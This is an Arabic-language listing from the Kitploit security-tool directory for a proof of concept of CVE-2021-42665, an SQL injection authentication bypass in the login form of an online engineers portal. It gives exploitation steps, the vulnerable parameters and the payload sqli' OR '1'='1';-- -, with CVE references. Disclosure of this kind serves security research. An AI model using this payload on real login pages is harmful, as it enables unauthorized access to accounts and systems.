Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-42665 — CVE-2021-42665 - ثغرة تجاوز المصادقة عبر حقن SQL في نظام بوابة المهندسين عبر الإنترنت. | Kitploit
أدوات/GitHubGitHub/0xdeku/cve-2021-42665
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHub0xdeku/cve-2021-42665

CVE-2021-42665

CVE-2021-42665 - ثغرة تجاوز المصادقة عبر حقن SQL في نظام بوابة المهندسين عبر الإنترنت.

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-42665

CVE-2021-42665 - ثغرة تجاوز المصادقة عبر حقن SQL في نظام بوابة المهندسين عبر الإنترنت.

الوصف الفني:

توجد ثغرة حقن SQL في نموذج تسجيل الدخول لبوابة المهندسين عبر الإنترنت والتي يمكن أن تسمح للمهاجم بتجاوز المصادقة.

المكونات المتأثرة -

الصفحة المعرضة للخطر - login.php

المعامل المعرض للخطر - "username"، "password"

خطوات الاستغلال:

  1. انتقل إلى http://localhost/nia_munoz_monitoring_system/login.php
  2. أدخل حمولتك في حقل اسم المستخدم أو كلمة المرور
  3. انقر على تسجيل الدخول

إثبات المفهوم (Poc) -

ستسمح لك الحمولة التالية بتجاوز آلية المصادقة في نموذج تسجيل الدخول لبوابة المهندسين عبر الإنترنت -

root@kitploit:~
sqli' OR '1'='1';-- -

CVE-2021-42665

المراجع -

https://www.exploit-db.com/exploits/50452

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42665

https://nvd.nist.gov/vuln/detail/CVE-2021-42665

اكتشف بواسطة -

Alon Leviev(0xDeku)، 22 أكتوبر, 2021.

تنزيل الأداة